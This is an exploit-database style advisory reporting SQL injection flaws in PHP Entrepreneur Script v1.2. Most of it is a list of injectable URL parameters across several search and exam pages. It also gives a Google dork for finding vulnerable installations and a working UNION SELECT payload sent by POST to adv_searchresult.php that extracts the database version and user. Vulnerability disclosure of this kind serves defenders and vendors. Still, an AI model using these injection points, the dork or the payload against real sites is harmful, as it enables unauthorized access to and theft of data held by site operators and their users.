###########################

# PHP Entrepreneur 1.2 SQL Injection Vulnerability

###########################

################################################
#Title: PHP Entrepreneur Script v1.2 - SQL Injection
#Credit: Bilal KARDADOU
#Vendor: www.jobportalscript.com
#Vendor URL: http://www.jobportalscript.com/entrepreneur-home-basic-
version.html
#Product: PHP Entrepreneur Script.
# Entrepreneur Script Feature Document : http://www.jobportalscript.
com/documents/entrepreneur.docx
#Google Dork: new_searchresult.php?left_cat=13 - ...
#
################################################
#
# --SQL Injection/Exploit--
#   www.localhost/new_searchresult.php?left_cat=5[SQL]
#   www.localhost/farea_search_result.php?fid=13[SQL]
#   www.localhost/categ_search_result.php?industry_type=17[SQL]
#   www.localhost/exam_question.php?cate_id=19[SQL]
#   www.localhost/categ_search_result.php?action=slogin&
industry_type=8[SQL]&jid_0=31320142800&jid_1=31408427830&save_job=Save+Jobs
#   www.localhost/farea_search_result.php?action=slogin&fid=
31[SQL]&jid_0=31469880989&jid_1=31454064191&jid_2=
31453804816&jid_4=31441601731&jid_5=31439299432&jid_6=
31413109189&jid_7=31412079908&save_job=Save+Jobs
#   www.localhost/quick_result.php?Search&search_type=[SQL]
#
#         [POST Method]
    www.localhost/adv_searchresult.php
keyword=woot&from_exp=0&to_exp=0&location=Morocco' UNION SELECT
1,@@version,user(),4,5,6,7,8-- -&area=1&submit=Search
# ---PoC---
#   http://prnt.sc/ehg2tz
#   http://prnt.sc/ehg386
#   http://prnt.sc/ehg3dm
#   http://prnt.sc/ehg3k8
#   http://prnt.sc/ehg197
#
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)
################################################

-- 
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-03-10]

###########################